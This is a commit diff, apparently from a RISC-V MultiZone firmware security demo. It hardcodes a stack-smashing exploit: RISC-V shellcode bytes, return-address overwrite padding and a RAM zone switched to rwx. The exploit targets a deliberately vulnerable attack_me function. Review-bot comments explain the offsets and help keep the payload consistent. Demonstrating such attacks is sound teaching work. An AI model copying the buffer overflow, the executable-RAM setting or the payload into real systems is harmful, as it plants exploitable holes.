Commit 10b2aaee authored by fptk's avatar fptk

working arty attack impl hardcoded

parent 7384d380
......@@ -7,7 +7,7 @@ Tick = 10 # ms
Zone = 1
plic = 21 # ETHERNET
base = 0x20440000; size = 128K; rwx = rwx # FLASH
base = 0x80001800; size = 38K; rwx = rw # RAM
base = 0x80001800; size = 38K; rwx = rwx # RAM
base = 0x8000B000; size = 2K; rwx = w # SH BUFF1
base = 0x8000B800; size = 8K; rwx = w # SH BUFF2
base = 0x60000000; size = 0x2000; rwx = rw # XEMACLITE
......
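Review bot: The RAM zone at 0x80001800 ends up with `rwx = rwx`, which drops the write-xor-execute separation the `rw` line kept; if the `rwx` line is the new side (the commit title and the fact that the handler's planted return address lies in this 0x8000_0000 RAM range both point that way), this is what allows code injected onto the stack to execute, and it should be marked as a deliberate demo-only weakening rather than left looking like a default. A trailing comment such as `# RAM (X added on purpose for the stack-smash demo; revert to rw for any real build)` would make that explicit. The old/new side of the two RAM lines is not recoverable from the rendered page, so this is inferred.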
.text
li a0, 0x2044b37c
li t3, 0x204408f8
jalr t4, t3
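Review bot: The two immediates carry no annotation of what they point at, and the same values are hand-assembled into the byte string in the `name=` branch of server_request_handler, so a drift between this listing and those bytes would break the exploit silently. Both addresses fall inside the zone's FLASH range (0x20440000, 128K); a header comment like `# a0 = 0x2044b37c (argument), t3 = 0x204408f8 (callee in FLASH); keep in sync with the payload bytes in server_request_handler` ties the two copies together. The `li` pseudo-instructions expand to the lui/addi pairs shown in the C comments, so the listing is the source of truth for those bytes.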
......@@ -5,9 +5,9 @@
#include "multizone.h"
#define printf2(format, args...) { /* Multi-part printf() */\
char *str = malloc(64); \
char *str = malloc(128); \
if (str != NULL){ \
const int len = snprintf(str, 64, format, ## args); \
const int len = snprintf(str, 128, format, ## args); \
for (int i=0; i<(len/16)+1; i++){ \
while(!MZONE_SEND(2, (str+16*i))) MZONE_YIELD(); \
} \
......
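Review bot: Growing the buffer to 128 does not remove the read past its end in the send loop: `snprintf` returns the length the formatted text would have had, so when the output is longer than 127 bytes `len` exceeds the buffer and `(len/16)+1` iterations walk `str+16*i` beyond the allocation. Clamp it before the loop, e.g. `int len = snprintf(str, 128, format, ## args);` followed by `if (len < 0) len = 0; else if (len > 127) len = 127;` (dropping the `const`). Assuming MZONE_SEND copies a fixed 16 bytes, the last chunk also ships whatever malloc left after the terminator into the other zone, so `calloc(1, 128)` is the safer allocation. The macro body continues past the end of the hunk, so whether `str` is freed is not visible here.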
......@@ -43,9 +43,10 @@ char *attack_me(char *data, uint32_t data_len) {
// nobody could possibly enter a name longer than 20 characters, so this buffer
// is definitely large enough
char message[128];
//for debugging purpose
printf2("Framepointer: 0x%x\n", *(uint32_t *)&message[140]);
printf2("Rücksprungadresse: 0x%x\n", *(uint32_t *)&message[140] - 204);
printf2("CD: 0x%08x ", ((uint32_t*)(&message[8])));
printf2("F-: 0x%08x ", *((uint32_t*)(&message[136])));
printf2("RA: 0x%08x ", *((uint32_t*)(&message[140])));
printf2("FP: 0x%08x ", *((uint32_t*)(&message[156])));
memset(message, 'B', sizeof(message));
memcpy(message, "Hallo, ", 7);
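Review bot: The four debug prints read `message[136]`, `message[140]` and `message[156]` on a 128-byte array, which is an out-of-bounds access the compiler is free to miscompile, and the `CD:` line passes a `uint32_t *` where `%08x` expects an unsigned int (it only works on RV32 because pointers happen to be 32-bit). If these exist to work out the frame layout, wrap them in `#ifdef ATTACK_DEBUG` so they are not compiled into the served binary, and print the address as `(unsigned)(uintptr_t)&message[8]` or with `%p`. The offsets look consistent with the handler's payload (7 bytes of `"Hallo, "` plus 129 payload bytes places the saved frame pointer at 136 and the return address at 140), so a comment stating that derivation would spare the next reader the arithmetic. attack_me continues beyond the hunk; the copy that overflows `message` is not visible here.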
......@@ -70,13 +71,54 @@ char *server_request_handler(char *location, enum request_type type, char *data,
if(data_len >= 5 && strncmp(data, "name=", 5) == 0) {
uint32_t name_len = data_len - 5;
name_len = webserver_percent_decode(&data[5], name_len);
data = "X" // padding to align the instructions
"\x37\xb5\x44\x20" // 0: lui a0,0x2044b
"\x13\x05\xc5\x37" // 4: addi a0,a0,892 # 0x2044b37c
"\x37\x1e\x44\x20" // 8: lui t3,0x20441
"\x13\x0e\x8e\x8f" // c: addi t3,t3,-1800 # 0x204408f8
"\xe7\x0e\x0e\x00" // 10: jalr t4,t3
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"\x2c\x69\x00\x80" // the new frame pointer: 0x80004ba2
"\x78\x68\x00\x80"; // the new return address: 0x80006870
// nobody could possibly enter a name longer than 20 characters, so this buffer
// is definitely large enough
char *return_string;
return_string = attack_me(&data[5], name_len);
//return_string = attack_me(&data[5], name_len);
return_string = attack_me(data, 137);
char* response = http_prepare_response(return_string, strlen(return_string), 200, out_len);
free(return_string);
//free(return_string);
return response;
} else {
return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);
......
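Review bot: The trailing comments on the two address words do not match the bytes they annotate: `"\x2c\x69\x00\x80"` is 0x8000692c little-endian, not 0x80004ba2, and `"\x78\x68\x00\x80"` is 0x80006878, not 0x80006870; since the commit says the attack works, the bytes are presumably right and the comments stale, so change them to `// the new frame pointer: 0x8000692c` and `// the new return address: 0x80006878`. The literal 137 passed to attack_me is also maintained by hand; declaring the payload as `static const char payload[] = "X" ...;` and calling `attack_me((char *)payload, sizeof payload - 1)` keeps the length in step with the string and stops reassigning the `data` parameter. With `free(return_string)` commented out, any request on which attack_me does return leaks the response buffer, and `name_len` is now computed but never used; if control really never comes back here, a one-line comment saying so would explain both. server_request_handler continues outside the hunk.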